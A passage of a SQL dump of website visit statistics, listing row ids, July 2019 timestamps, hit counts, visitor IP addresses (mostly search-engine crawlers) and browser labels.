162,1563097908,2,2,0,0,'40.77.167.219','other'),(435163,1563098011,1,1,0,0,'66.249.69.58','chrome'),(435164,1563098557,1,1,0,0,'40.77.167.150','other'),(435165,1563098665,1,1,0,0,'109.74.154.72','chrome'),(435166,1563099301,1,1,0,0,'66.249.69.58','chrome'),(435167,1563099389,1,1,0,0,'8.29.198.26','other'),(435168,1563100540,1,1,0,0,'8.29.198.27','other'),(435169,1563100839,1,1,0,0,'66.249.69.60','chrome'),(435170,1563100955,1,1,0,0,'157.55.39.218','other'),(435171,1563100996,2,2,0,0,'40.77.167.150','other'),(435172,1563101916,3,3,0,0,'66.249.69.58','chrome'),(435173,1563101974,2,2,0,0,'66.249.69.62','chrome'),(435174,1563102000,1,1,0,0,'141.8.188.29','other'),(435175,1563102001,1,1,0,0,'66.249.69.60','chrome'),(435176,1563102045,1,1,0,0,'66.249.75.122','chrome'),(435177,1563102241,1,1,0,0,'40.77.167.150','other'),(435178,1563102402,1,1,0,0,'157.55.39.145','other'),(435179,1563102456,1,1,0,0,'66.249.75.126','chrome'),(435180,1563102471,1,1,0,0,'157.55.39.218','other'),(435181,1563102879,1,1,0,0,'66.249.69.58','chrome'),(435182,1563102914,1,1,0,0,'207.46.13.56','other'),(435183,1563106576,1,1,0,0,'40.77.167.150','other'),(435184,1563106713,5,5,0,0,'207.46.13.56','other'),(435185,1563106719,3,3,0,0,'157.55.39.218','other'),(435186,1563106725,6,6,0,0,'157.55.39.145','other'),(435187,1563106803,1,1,0,0,'141.8.188.11','other'),(435188,1563107346,1,1,0,0,'176.9.9.94','other'),(435189,1563107707,1,1,0,0,'141.8.188.29','other'),(435190,1563108034,1,1,0,0,'207.46.13.56','other'),(435191,1563109062,2,2,0,0,'66.249.69.62','chrome'),(435192,1563109439,1,1,0,0,'40.77.167.150','other'),(435193,1563109441,1,1,0,0,'207.46.13.56','other'),(435194,1563109489,1,1,0,0,'66.249.75.126','chrome'),(435195,1563110208,1,1,0,0,'91.196.178.188','chrome'),(435196,1563110235,1,1,0,0,'8.29.198.25','other'),(435197,1563110809,2,2,0,0,'66.249.69.58','chrome'),(435198,1563110867,1,1,0,0,'66.249.75.124','chrome'),(435199,1563110903,4,4,0,0,'66.249.69.60','chrome'),(435200,1563111403,1,1,0,0,'8.29.198.26','other'),(435201,1563111516,1,1,0,0,'157.55.39.218','other'),(435202,1563111601,1,1,0,0,'157.55.39.145','other'),(435203,1563111631,1,1,0,0,'66.249.75.126','chrome'),(435204,1563111649,1,1,0,0,'66.249.75.122','chrome'),(435205,1563112981,1,1,0,0,'5.45.207.79','other'),(435206,1563112982,1,1,0,0,'5.45.207.19','other'),(435207,1563113075,2,2,0,0,'141.8.188.29','other'),(435208,1563113570,1,1,0,0,'66.249.69.60','chrome'),(435209,1563114167,3,3,0,0,'207.46.13.137','other'),(435210,1563114734,1,1,0,0,'5.45.207.79','other'),(435211,1563115352,1,1,0,0,'207.46.13.137','other'),(435212,1563115651,1,1,0,0,'66.249.69.62','chrome'),(435213,1563116336,1,1,0,0,'157.55.39.218','other'),(435214,1563116347,2,2,0,0,'141.8.188.11','other'),(435215,1563116397,1,1,0,0,'54.158.225.143','chrome'),(435216,1563117384,1,1,0,0,'66.249.75.126','chrome'),(435217,1563117960,1,1,0,0,'141.8.188.29','other'),(435218,1563118238,1,1,0,0,'185.5.250.113','chrome'),(435219,1563118629,1,1,0,0,'176.9.9.94','other'),(435220,1563118956,1,1,0,0,'46.211.110.147','chrome'),(435221,1563118961,1,1,0,0,'66.249.69.58','chrome'),(435222,1563119003,2,2,0,0,'66.249.75.124','chrome'),(435223,1563119086,2,2,0,0,'66.249.69.60','chrome'),(435224,1563119134,2,2,0,0,'66.249.69.62','chrome'),(435225,1563119339,6,6,0,0,'46.101.80.192','chrome'),(435226,1563119970,2,2,0,0,'207.46.13.221','other'),(435227,1563120033,1,1,0,0,'40.77.167.59','other'),(435228,1563120712,1,1,0,0,'141.8.188.11','other'),(435229,1563120959,1,1,0,0,'66.249.75.126','chrome'),(435230,1563120964,1,1,0,0,'77.74.177.114','chrome'),(435231,1563121069,1,1,0,0,'8.29.198.25','other'),(435232,1563121169,2,2,0,0,'66.249.69.62','chrome'),(435233,1563121719,1,1,0,0,'91.196.178.86','chrome'),(435234,1563121801,1,1,0,0,'66.249.75.124','chrome'),(435235,1563121826,2,2,0,0,'141.8.188.11','other'),(435236,1563122160,1,1,0,0,'66.249.69.58','chrome'),(435237,1563122258,1,1,0,0,'8.29.198.25','other'),(435238,1563122826,1,1,0,0,'141.8.188.29','other'),(435239,1563123489,2,2,0,0,'207.46.13.137','other'),(435240,1563123624,1,1,0,0,'40.77.167.59','other'),(435241,1563124472,1,1,0,0,'207.46.13.137','other'),(435242,1563125233,3,3,0,0,'66.249.69.60','chrome'),(435243,1563125347,2,2,0,0,'66.249.69.58','chrome'),(435244,1563125529,1,1,0,0,'66.249.69.62','chrome'),(435245,1563126166,1,1,0,0,'207.46.13.137','other'),(435246,1563126288,1,1,0,0,'40.77.167.59','other'),(435247,1563126327,1,1,0,0,'141.8.188.29','other'),(435248,1563126438,1,1,0,0,'176.110.134.2','chrome'),(435249,1563127195,3,3,0,0,'66.249.69.60','chrome'),(435250,1563127338,24,24,0,0,'37.17.172.132','firefox'),(435251,1563127912,2,2,0,0,'207.46.13.137','other'),(435252,1563128046,2,2,0,0,'141.8.188.29','other'),(435253,1563128058,1,1,0,0,'66.249.69.58','chrome'),(435254,1563128239,8,8,0,0,'37.17.172.132','firefox'),(435255,1563128304,1,1,0,0,'40.77.167.105','other'),(435256,1563128825,1,1,0,0,'207.46.13.137','other'),(435257,1563128863,1,1,0,0,'66.249.69.60','chrome'),(435258,1563129594,1,1,0,0,'40.77.167.105','other'),(435259,1563129843,1,1,0,0,'66.249.69.60','chrome'),(435260,1563130028,1,1,0,0,'66.249.75.126','chrome'),(435261,1563131920,1,1,0,0,'8.29.198.26','other'),(435262,1563132001,1,1,0,0,'40.77.167.59','other'),(435263,1563132103,1,1,0,0,'66.249.69.60','chrome'),(435264,1563133113,1,1,0,0,'8.29.198.27','other'),(435265,1563133256,3,3,0,0,'66.249.69.60','chrome'),(435266,1563133348,2,2,0,0,'66.249.69.62','chrome'),(435267,1563133490,1,1,0,0,'66.249.69.58','chrome'),(435268,1563133685,2,2,0,0,'66.249.75.122','chrome'),(435269,1563133795,1,1,0,0,'130.180.212.128','chrome'),(435270,1563134700,1,1,0,0,'66.249.75.124','chrome'),(435271,1563134742,4,4,0,0,'66.249.69.60','chrome'),(435272,1563134813,2,2,0,0,'66.249.69.62','chrome'),(435273,1563134900,1,1,0,0,'66.249.75.126','chrome'),(435274,1563135031,5,5,0,0,'66.249.69.58','chrome'),(435275,1563136122,1,1,0,0,'157.55.39.189','other'),(435276,1563136365,1,1,0,0,'207.46.13.137','other'),(435277,1563136647,2,2,0,0,'66.249.69.60','chrome'),(435278,1563136660,2,2,0,0,'66.249.69.58','chrome'),(435279,1563137698,1,1,0,0,'207.46.13.26','other'),(435280,1563137846,1,1,0,0,'40.77.167.28','other'),(435281,1563137858,1,1,0,0,'207.46.13.165','other'),(435282,1563138441,1,1,0,0,'157.55.39.189','other'),(435283,1563141054,1,1,0,0,'66.249.75.122','chrome'),(435284,1563141334,1,1,0,0,'66.249.69.62','chrome'),(435285,1563141499,1,1,0,0,'13.66.139.0','other'),(435286,1563141670,1,1,0,0,'157.55.39.189','other'),(435287,1563142450,2,2,0,0,'176.9.9.94','other'),(435288,1563142652,2,2,0,0,'40.77.167.28','other'),(435289,1563142753,1,1,0,0,'8.29.198.26','other'),(435290,1563143224,1,1,0,0,'66.249.69.58','chrome'),(435291,1563143975,1,1,0,0,'8.29.198.26','other'),(435292,1563144708,1,1,0,0,'157.55.39.189','other'),(435293,1563146433,1,1,0,0,'157.55.39.118','other'),(435294,1563147046,1,1,0,0,'157.55.39.189','other'),(435295,1563147292,2,2,0,0,'66.249.69.62','chrome'),(435296,1563148797,3,3,0,0,'207.46.13.82','other'),(435297,1563149353,2,2,0,0,'66.249.69.58','chrome'),(435298,1563149462,1,1,0,0,'66.249.75.122','chrome'),(435299,1563149807,1,1,0,0,'178.255.215.94','other'),(435300,1563150291,1,1,0,0,'5.62.19.33','chrome'),(435301,1563150433,3,3,0,0,'157.55.39.189','other'),(435302,1563150552,7,7,0,0,'66.249.69.62','chrome'),(435303,1563150611,4,4,0,0,'66.249.69.58','chrome'),(435304,1563150913,1,1,0,0,'66.249.75.122','chrome'),(435305,1563151310,1,1,0,0,'207.46.13.74','other'),(435306,1563151580,1,1,0,0,'207.46.13.123','other'),(435307,1563151905,1,1,0,0,'66.249.69.62','chrome'),(435308,1563153557,1,1,0,0,'207.46.13.135','other'),(435309,1563153597,1,1,0,0,'8.29.198.26','other'),(435310,1563153621,1,1,0,0,'207.46.13.82','other'),(435311,1563154736,1,1,0,0,'141.8.188.11','other'),(435312,1563154845,1,1,0,0,'8.29.198.27','other'),(435313,1563155212,1,1,0,0,'157.55.39.66','other'),(435314,1563155937,1,1,0,0,'176.9.9.94','other'),(435315,1563155965,1,1,0,0,'207.46.13.135','other'),(435316,1563156263,1,1,0,0,'141.8.183.22','other'),(435317,1563157304,1,1,0,0,'66.249.69.60','chrome'),(435318,1563157365,2,2,0,0,'66.249.69.62','chrome'),(435319,1563157373,1,1,0,0,'66.249.69.58','chrome'),(435320,1563157497,1,1,0,0,'157.55.39.66','other'),(435321,1563157836,2,2,0,0,'207.46.13.135','other'),(435322,1563159370,2,2,0,0,'40.77.167.204','other'),(435323,1563159516,1,1,0,0,'157.55.39.66','other'),(435324,1563159573,1,1,0,0,'66.249.75.122','chrome'),(435325,1563159635,1,1,0,0,'66.249.69.60','chrome'),(435326,1563159777,1,1,0,0,'207.46.13.135','other'),(435327,1563159860,1,1,0,0,'5.45.207.79','other'),(435328,1563160208,3,3,0,0,'207.46.13.123','other'),(435329,1563160806,1,1,0,0,'157.55.39.66','other'),(435330,1563161363,2,2,0,0,'66.249.69.60','chrome'),(435331,1563163240,1,1,0,0,'157.55.39.66','other'),(435332,1563164256,1,1,0,0,'207.46.13.135','other'),(435333,1563164438,1,1,0,0,'8.29.198.26','other'),(435334,1563164634,1,1,0,0,'66.249.69.58','chrome'),(435335,1563164913,2,2,0,0,'66.249.69.62','chrome'),(435336,1563165156,2,2,0,0,'66.249.69.60','chrome'),(435337,1563165249,1,1,0,0,'66.249.75.126','chrome'),(435338,1563165709,1,1,0,0,'8.29.198.27','other'),(435339,1563166363,2,2,0,0,'66.249.69.62','chrome'),(435340,1563166495,1,1,0,0,'95.108.213.4','other'),(435341,1563166528,1,1,0,0,'141.8.188.29','other'),(435342,1563166609,1,1,0,0,'178.154.200.8','other'),(435343,1563166724,1,1,0,0,'66.249.69.60','chrome'),(435344,1563166746,1,1,0,0,'66.249.75.124','chrome'),(435345,1563167088,1,1,0,0,'66.249.69.58','chrome'),(435346,1563167597,3,3,0,0,'207.46.13.135','other'),(435347,1563168366,1,1,0,0,'207.46.13.123','other'),(435348,1563169086,1,1,0,0,'51.15.235.211','other'),(435349,1563169755,1,1,0,0,'40.77.167.173','other'),(435350,1563170271,1,1,0,0,'95.132.61.71','chrome'),(435351,1563170656,1,1,0,0,'40.77.167.52','other'),(435352,1563171004,1,1,0,0,'66.249.69.58','chrome'),(435353,1563171370,1,1,0,0,'157.55.39.213','other'),(435354,1563171957,3,3,0,0,'141.8.188.29','other'),(435355,1563172252,1,1,0,0,'40.77.167.52','other'),(435356,1563173452,1,1,0,0,'66.249.69.60','chrome'),(435357,1563173495,1,1,0,0,'60.191.38.77','firefox'),(435358,1563173843,1,1,0,0,'66.249.69.58','chrome'),(435359,1563175289,1,1,0,0,'8.29.198.25','other'),(435360,1563175654,1,1,0,0,'141.8.188.11','other'),(435361,1563175887,1,1,0,0,'66.249.69.58','chrome'),(435362,1563176581,1,1,0,0,'8.29.198.26','other'),(435363,1563177006,1,1,0,0,'91.196.178.163','chrome'),(435364,1563177512,1,1,0,0,'40.77.167.52','other'),(435365,1563177732,1,1,0,0,'95.134.221.86','chrome'),(435366,1563177777,1,1,0,0,'60.191.38.77','firefox'),(435367,1563177788,1,1,0,0,'66.249.69.58','chrome'),(435368,1563178478,1,1,0,0,'141.8.188.11','other'),(435369,1563178512,2,2,0,0,'40.77.167.12','other'),(435370,1563178929,1,1,0,0,'176.9.9.94','other'),(435371,1563179000,1,1,0,0,'91.196.178.183','chrome'),(435372,1563179563,1,1,0,0,'91.196.178.98','chrome'),(435373,1563179647,1,1,0,0,'66.249.69.60','chrome'),(435374,1563179691,1,1,0,0,'141.8.188.11','other'),(435375,1563180233,1,1,0,0,'207.46.13.174','other'),(435376,1563180788,1,1,0,0,'66.249.69.62','chrome'),(435377,1563180796,1,1,0,0,'66.249.69.60','chrome'),(435378,1563181578,2,2,0,0,'157.55.39.213','other'),(435379,1563181636,1,1,0,0,'95.132.61.71','chrome'),(435380,1563182522,2,2,0,0,'141.8.188.29','other'),(435381,1563182939,2,2,0,0,'66.249.69.62','chrome'),(435382,1563183119,1,1,0,0,'141.8.188.11','other'),(435383,1563183844,1,1,0,0,'40.77.167.12','other'),(435384,1563184402,1,1,0,0,'207.46.13.174','other'),(435385,1563185138,1,1,0,0,'141.8.188.29','other'),(435386,1563185313,1,1,0,0,'40.77.167.12','other'),(435387,1563185427,1,1,0,0,'109.74.154.72','chrome'),(435388,1563185521,1,1,0,0,'157.55.39.213','other'),(435389,1563186019,1,1,0,0,'46.0.32.11','msie'),(435390,1563186104,1,1,0,0,'40.77.167.163','other'),(435391,1563186139,1,1,0,0,'8.29.198.25','other'),(435392,1563186295,1,1,0,0,'141.8.188.29','other'),(435393,1563186504,1,1,0,0,'87.250.224.65','other'),(435394,1563186644,1,1,0,0,'13.66.139.0','other'),(435395,1563186880,1,1,0,0,'66.249.69.58','chrome'),(435396,1563187480,1,1,0,0,'8.29.198.25','other'),(435397,1563187534,1,0,1,0,'66.249.75.122',''),(435398,1563187561,1,1,0,0,'40.77.167.58','other'),(435399,1563187709,1,1,0,0,'40.77.167.163','other'),(435400,1563187803,3,3,0,0,'40.77.167.12','other'),(435401,1563187917,1,1,0,0,'141.8.188.11','other'),(435402,1563188789,1,1,0,0,'66.249.69.60','chrome'),(435403,1563188806,1,1,0,0,'40.77.167.12','other'),(435404,1563189152,3,3,0,0,'40.77.167.58','other'),(435405,1563189259,1,1,0,0,'157.55.39.213','other'),(435406,1563189334,2,2,0,0,'40.77.167.163','other'),(435407,1563189692,1,1,0,0,'91.196.178.89','chrome'),(435408,1563190694,1,1,0,0,'66.249.69.60','chrome'),(435409,1563190939,1,1,0,0,'91.196.178.82','chrome'),(435410,1563191361,2,2,0,0,'40.77.167.163','other'),(435411,1563191824,1,1,0,0,'185.151.86.66','chrome'),(435412,1563192199,1,1,0,0,'91.196.178.82','chrome'),(435413,1563192914,2,2,0,0,'40.77.167.80','other'),(435414,1563193124,1,1,0,0,'5.45.207.79','other'),(435415,1563193642,1,1,0,0,'157.55.39.213','other'),(435416,1563193718,2,2,0,0,'40.77.167.163','other'),(435417,1563193720,1,1,0,0,'141.8.188.29','other'),(435418,1563194389,1,1,0,0,'91.196.178.82','chrome'),(435419,1563194442,1,1,0,0,'185.151.86.66','chrome'),(435420,1563194489,1,1,0,0,'66.249.69.62','chrome'),(435421,1563194752,1,1,0,0,'40.77.167.80','other'),(435422,1563195304,1,1,0,0,'40.77.167.163','other'),(435423,1563195356,1,1,0,0,'91.196.178.82','chrome'),(435424,1563196285,1,1,0,0,'40.77.167.163','other'),(435425,1563196302,1,1,0,0,'37.52.165.254','chrome'),(435426,1563196399,1,1,0,0,'157.55.39.142','other'),(435427,1563196665,2,2,0,0,'91.124.182.170','firefox'),(435428,1563196757,4,4,0,0,'157.55.39.213','other'),(435429,1563196978,1,1,0,0,'8.29.198.26','other'),(435430,1563197098,1,1,0,0,'91.196.178.74','chrome'),(435431,1563197496,1,1,0,0,'91.196.177.99','chrome'),(435432,1563197597,2,2,0,0,'66.249.69.58','chrome'),(435433,1563197979,1,1,0,0,'46.211.111.2','chrome'),(435434,1563198002,1,1,0,0,'66.249.69.60','chrome'),(435435,1563198003,1,1,0,0,'5.255.253.38','other'),(435436,1563198056,1,1,0,0,'95.108.213.4','other'),(435437,1563198230,2,2,0,0,'157.55.39.142','other'),(435438,1563198365,1,1,0,0,'8.29.198.25','other'),(435439,1563199034,1,1,0,0,'91.196.178.82','chrome'),(435440,1563199067,1,1,0,0,'91.124.182.170','firefox'),(435441,1563199808,1,1,0,0,'213.180.203.9','other'),(435442,1563199973,1,1,0,0,'40.77.167.80','other'),(435443,1563200383,1,1,0,0,'207.46.13.47','other'),(435444,1563200434,1,1,0,0,'91.196.178.73','firefox'),(435445,1563200918,1,1,0,0,'40.77.167.80','other'),(435446,1563201804,1,1,0,0,'178.133.97.43','chrome'),(435447,1563202770,1,1,0,0,'51.38.115.98','chrome'),(435448,1563203758,1,1,0,0,'128.124.12.47','chrome'),(435449,1563203807,1,1,0,0,'40.77.167.189','other'),(435450,1563203969,1,1,0,0,'46.211.130.183','chrome'),(435451,1563204029,1,1,0,0,'92.112.104.52','chrome'),(435452,1563204280,1,1,0,0,'66.249.69.58','chrome'),(435453,1563204413,1,1,0,0,'91.196.177.99','chrome'),(435454,1563204530,2,2,0,0,'207.46.13.47','other'),(435455,1563204818,1,1,0,0,'141.8.188.11','other'),(435456,1563205775,1,1,0,0,'157.55.39.142','other'),(435457,1563206167,1,1,0,0,'185.162.145.210','firefox'),(435458,1563206287,1,1,0,0,'66.249.75.126','chrome'),(435459,1563206343,2,2,0,0,'66.249.69.58','chrome'),(435460,1563206523,1,1,0,0,'91.196.177.99','chrome'),(435461,1563206617,1,1,0,0,'91.196.176.13','chrome'),(435462,1563206623,1,1,0,0,'40.77.167.189','other'),(435463,1563206681,1,1,0,0,'66.249.69.62','chrome'),(435464,1563206704,1,1,0,0,'66.249.69.60','chrome'),(435465,1563206831,1,1,0,0,'207.46.13.47','other'),(435466,1563206835,1,1,0,0,'157.55.39.142','other'),(435467,1563206840,2,2,0,0,'157.55.39.121','other'),(435468,1563206930,2,2,0,0,'141.8.188.11','other'),(435469,1563207272,1,1,0,0,'193.106.30.99','chrome'),(435470,1563207382,1,1,0,0,'141.8.188.29','other'),(435471,1563207726,1,1,0,0,'91.196.178.74','chrome'),(435472,1563207825,1,1,0,0,'8.29.198.27','other'),(435473,1563207915,2,2,0,0,'157.55.39.142','other'),(435474,1563208034,3,3,0,0,'157.55.39.121','other'),(435475,1563208149,1,1,0,0,'95.135.88.177','chrome'),(435476,1563208458,1,1,0,0,'128.124.41.56','chrome'),(435477,1563208621,1,1,0,0,'66.249.69.62','chrome'),(435478,1563208630,3,3,0,0,'66.249.69.60','chrome'),(435479,1563208689,1,1,0,0,'82.145.212.5','other'),(435480,1563208728,1,1,0,0,'66.249.75.126','chrome'),(435481,1563208772,2,2,0,0,'66.249.69.58','chrome'),(435482,1563208836,1,1,0,0,'91.196.178.104','chrome'),(435483,1563208839,1,1,0,0,'46.211.121.247','chrome'),(435484,1563209086,1,1,0,0,'94.178.106.45','chrome'),(435485,1563209241,1,1,0,0,'8.29.198.26','other'),(435486,1563209283,1,1,0,0,'46.211.131.117','other'),(435487,1563209326,1,1,0,0,'94.180.133.184','chrome'),(435488,1563209559,1,1,0,0,'82.145.222.207','chrome'),(435489,1563210109,1,1,0,0,'82.145.210.188','other'),(435490,1563210165,1,1,0,0,'91.196.178.104','chrome'),(435491,1563210289,1,1,0,0,'185.210.87.244','chrome'),(435492,1563210321,1,1,0,0,'141.8.188.11','other'),(435493,1563210354,1,1,0,0,'91.196.178.9','chrome'),(435494,1563210511,1,1,0,0,'37.52.22.54','chrome'),(435495,1563210845,2,2,0,0,'207.46.13.47','other'),(435496,1563210854,1,1,0,0,'46.96.20.202','chrome'),(435497,1563211036,1,1,0,0,'66.249.69.58','chrome'),(435498,1563211074,1,1,0,0,'157.55.39.142','other'),(435499,1563211075,1,1,0,0,'91.196.177.69','chrome'),(435500,1563211255,1,1,0,0,'46.211.134.10','chrome'),(435501,1563211354,1,1,0,0,'91.196.121.12','chrome'),(435502,1563211907,1,1,0,0,'46.96.7.22','chrome'),(435503,1563211990,1,1,0,0,'46.211.111.95','chrome'),(435504,1563212207,1,1,0,0,'91.196.178.44','chrome'),(435505,1563212245,1,1,0,0,'95.132.4.228','chrome'),(435506,1563212272,2,2,0,0,'207.46.13.47','other'),(435507,1563212475,1,1,0,0,'109.173.90.41','msie'),(435508,1563212482,1,1,0,0,'5.3.190.177','msie'),(435509,1563212504,1,1,0,0,'91.196.178.88','firefox'),(435510,1563212614,1,1,0,0,'37.73.253.22','chrome'),(435511,1563212641,1,1,0,0,'91.196.177.40','chrome'),(435512,1563212647,1,1,0,0,'91.196.178.136','chrome'),(435513,1563212825,1,1,0,0,'46.96.13.206','chrome'),(435514,1563212966,3,3,0,0,'95.134.184.5','chrome'),(435515,1563213360,1,1,0,0,'40.77.167.189','other'),(435516,1563213556,1,1,0,0,'46.211.134.43','chrome'),(435517,1563213634,1,1,0,0,'91.196.178.97','chrome'),(435518,1563213658,1,1,0,0,'37.54.17.74','chrome'),(435519,1563213722,1,1,0,0,'207.46.13.47','other'),(435520,1563213810,1,1,0,0,'46.96.51.5','other'),(435521,1563213827,2,2,0,0,'157.55.39.142','other'),(435522,1563214374,1,1,0,0,'91.196.178.103','chrome'),(435523,1563214445,1,1,0,0,'91.196.178.129','chrome'),(435524,1563214830,1,1,0,0,'91.196.178.188','chrome'),(435525,1563214862,1,1,0,0,'141.8.188.11','other'),(435526,1563214970,1,1,0,0,'157.55.39.142','other'),(435527,1563215129,1,1,0,0,'207.46.13.47','other'),(435528,1563215212,1,1,0,0,'91.196.178.186','chrome'),(435529,1563215414,1,1,0,0,'40.77.167.135','other'),(435530,1563215521,1,1,0,0,'91.196.178.133','chrome'),(435531,1563215890,1,1,0,0,'157.55.39.142','other'),(435532,1563216462,1,1,0,0,'207.46.13.47','other'),(435533,1563216480,1,1,0,0,'207.46.13.76','other'),(435534,1563216778,1,1,0,0,'37.55.226.201','other'),(435535,1563217403,2,2,0,0,'207.46.13.47','other'),(435536,1563217444,1,1,0,0,'157.55.39.142','other'),(435537,1563217487,1,1,0,0,'91.196.178.171','chrome'),(435538,1563218046,1,1,0,0,'66.249.69.62','chrome'),(435539,1563218553,1,1,0,0,'46.211.49.244','chrome'),(435540,1563218684,1,1,0,0,'8.29.198.26','other'),(435541,1563218732,1,1,0,0,'107.178.194.234','chrome'),(435542,1563218854,2,2,0,0,'91.196.178.99','chrome'),(435543,1563219490,1,1,0,0,'31.13.127.29','other'),(435544,1563219493,1,1,0,0,'31.13.127.25','other'),(435545,1563219759,1,1,0,0,'91.196.178.99','chrome'),(435546,1563219783,1,1,0,0,'40.77.167.135','other'),(435547,1563219849,2,2,0,0,'95.213.141.126','opera'),(435548,1563220118,1,1,0,0,'8.29.198.27','other'),(435549,1563220232,1,1,0,0,'207.46.13.76','other'),(435550,1563220323,1,1,0,0,'93.73.146.94','chrome'),(435551,1563221731,2,2,0,0,'207.46.13.76','other'),(435552,1563222326,1,1,0,0,'45.55.58.166','other'),(435553,1563222333,1,1,0,0,'207.46.13.189','other'),(435554,1563222443,1,1,0,0,'91.196.178.48','chrome'),(435555,1563224169,2,2,0,0,'207.46.13.189','other'),(435556,1563224939,1,1,0,0,'157.55.39.105','other'),(435557,1563225604,2,2,0,0,'207.46.13.76','other'),(435558,1563226168,1,1,0,0,'40.77.167.135','other'),(435559,1563226373,2,2,0,0,'207.46.13.189','other'),(435560,1563227078,1,1,0,0,'207.46.13.76','other'),(435561,1563227927,1,1,0,0,'40.77.167.135','other'),(435562,1563228699,1,1,0,0,'40.77.167.113','other'),(435563,1563229537,1,1,0,0,'8.29.198.25','other'),(435564,1563230994,1,1,0,0,'8.29.198.26','other'),(435565,1563231947,1,1,0,0,'40.77.167.163','other'),(435566,1563232155,1,1,0,0,'207.46.13.76','other'),(435567,1563232368,1,1,0,0,'157.55.39.105','other'),(435568,1563232410,1,1,0,0,'95.108.181.83','other'),(435569,1563232813,1,1,0,0,'5.45.207.79','other'),(435570,1563233601,1,1,0,0,'157.55.39.105','other'),(435571,1563234224,1,1,0,0,'40.77.167.168','other'),(435572,1563234288,1,1,0,0,'40.77.167.57','other'),(435573,1563235196,1,1,0,0,'40.77.167.57','other'),(435574,1563235754,4,4,0,0,'40.77.167.168','other'),(435575,1563236584,1,1,0,0,'95.108.181.54','other'),(435576,1563237301,1,1,0,0,'157.55.39.105','other'),(435577,1563239108,2,2,0,0,'157.55.39.243','other'),(435578,1563239903,1,1,0,0,'5.45.207.79','other'),(435579,1563240059,1,1,0,0,'141.8.188.11','other'),(435580,1563240165,1,1,0,0,'13.66.139.0','other'),(435581,1563240345,1,1,0,0,'157.55.39.105','other'),(435582,1563240385,1,1,0,0,'8.29.198.26','other'),(435583,1563240391,2,2,0,0,'40.77.167.57','other'),(435584,1563240474,1,1,0,0,'40.77.167.168','other'),(435585,1563241423,1,1,0,0,'40.77.167.168','other'),(435586,1563241858,1,1,0,0,'8.29.198.27','other'),(435587,1563242487,1,1,0,0,'5.45.207.19','other'),(435588,1563243265,1,1,0,0,'141.8.188.11','other'),(435589,1563244855,1,1,0,0,'40.77.167.168','other'),(435590,1563244861,1,1,0,0,'207.46.13.145','other'),(435591,1563245118,76,76,0,0,'144.76.96.236','other'),(435592,1563245382,1,1,0,0,'40.77.167.156','other'),(435593,1563245678,1,1,0,0,'54.202.148.186','other'),(435594,1563246395,1,1,0,0,'178.154.200.48','other'),(435595,1563246399,1,1,0,0,'213.180.203.17','other'),(435596,1563246521,1,1,0,0,'87.250.224.47','other'),(435597,1563246892,3,3,0,0,'40.77.167.156','other'),(435598,1563247073,224,224,0,0,'144.76.96.236','other'),(435599,1563247502,1,1,0,0,'40.77.167.157','other'),(435600,1563247812,1,1,0,0,'40.77.167.168','other'),(435601,1563248017,2,2,0,0,'5.45.207.79','other'),(435602,1563248040,1,1,0,0,'141.8.188.11','other'),(435603,1563248120,2,2,0,0,'141.8.188.29','other'),(435604,1563248217,1,1,0,0,'207.46.13.64','other'),(435605,1563249492,1,1,0,0,'40.77.167.157','other'),(435606,1563251086,1,1,0,0,'207.46.13.64','other'),(435607,1563251237,1,1,0,0,'8.29.198.26','other'),(435608,1563251774,2,2,0,0,'40.77.167.156','other'),(435609,1563252041,2,2,0,0,'40.77.167.157','other'),(435610,1563252739,1,1,0,0,'8.29.198.26','other'),(435611,1563252888,1,1,0,0,'40.77.167.172','other'),(435612,1563253155,1,1,0,0,'46.211.128.73','chrome'),(435613,1563253451,1,1,0,0,'141.8.188.11','other'),(435614,1563253774,1,1,0,0,'141.8.188.29','other'),(435615,1563254261,1,1,0,0,'103.71.176.106','msie'),(435616,1563254468,16,16,0,0,'144.76.40.222','other'),(435617,1563254949,1,1,0,0,'40.77.167.156','other'),(435618,1563255355,1,1,0,0,'141.8.188.11','other'),(435619,1563256161,1,1,0,0,'51.38.247.95','other'),(435620,1563256542,1,1,0,0,'40.77.167.172','other'),(435621,1563257589,1,1,0,0,'46.211.103.52','chrome'),(435622,1563257640,1,1,0,0,'52.162.161.148','other'),(435623,1563257977,1,1,0,0,'66.249.69.60','chrome'),(435624,1563257979,1,1,0,0,'66.249.69.58','chrome'),(435625,1563258303,1,1,0,0,'91.196.178.102','chrome'),(435626,1563258595,1,1,0,0,'207.46.13.190','other'),(435627,1563258827,1,1,0,0,'207.46.13.72','other'),(435628,1563259800,1,1,0,0,'207.46.13.190','other'),(435629,1563260065,1,1,0,0,'66.249.69.62','chrome'),(435630,1563260247,1,1,0,0,'46.211.122.159','chrome'),(435631,1563260756,1,1,0,0,'141.8.188.29','other'),(435632,1563261189,3,3,0,0,'34.66.199.186','chrome'),(435633,1563261237,3,3,0,0,'35.226.101.101','chrome'),(435634,1563261265,3,3,0,0,'34.67.125.18','chrome'),(435635,1563261283,5,5,0,0,'104.154.166.92','chrome'),(435636,1563261312,3,3,0,0,'34.66.103.28','chrome'),(435637,1563261776,2,2,0,0,'207.46.13.190','other'),(435638,1563261781,5,5,0,0,'207.46.13.72','other'),(435639,1563261787,2,2,0,0,'207.46.13.64','other'),(435640,1563262098,1,1,0,0,'8.29.198.27','other'),(435641,1563262260,1,1,0,0,'5.45.207.19','other'),(435642,1563263302,1,1,0,0,'195.138.86.130','chrome'),(435643,1563263633,1,1,0,0,'8.29.198.26','other'),(435644,1563263964,1,1,0,0,'207.46.13.64','other'),(435645,1563264821,1,1,0,0,'207.46.13.190','other'),(435646,1563267149,1,1,0,0,'157.55.39.107','other'),(435647,1563267162,1,1,0,0,'66.249.69.58','chrome'),(435648,1563267263,1,1,0,0,'207.46.13.190','other'),(435649,1563267317,1,1,0,0,'91.242.199.123','chrome'),(435650,1563267346,1,1,0,0,'5.45.207.79','other'),(435651,1563267603,1,1,0,0,'141.8.188.29','other'),(435652,1563268718,2,2,0,0,'46.201.174.139','chrome'),(435653,1563269034,1,1,0,0,'157.55.39.71','other'),(435654,1563269270,1,1,0,0,'207.46.13.190','other'),(435655,1563270485,1,1,0,0,'207.46.13.190','other'),(435656,1563270540,3,3,0,0,'141.8.188.29','other'),(435657,1563270850,1,1,0,0,'94.180.230.142','chrome'),(435658,1563270933,3,3,0,0,'207.46.13.72','other'),(435659,1563271258,1,1,0,0,'35.238.118.87','firefox'),(435660,1563271402,1,1,0,0,'5.45.207.19','other'),(435661,1563272042,1,1,0,0,'66.249.75.126','chrome'),(435662,1563272314,1,1,0,0,'66.249.75.122','chrome'),(435663,1563272643,2,2,0,0,'141.8.188.11','other'),(435664,1563272691,1,1,0,0,'109.74.154.72','chrome'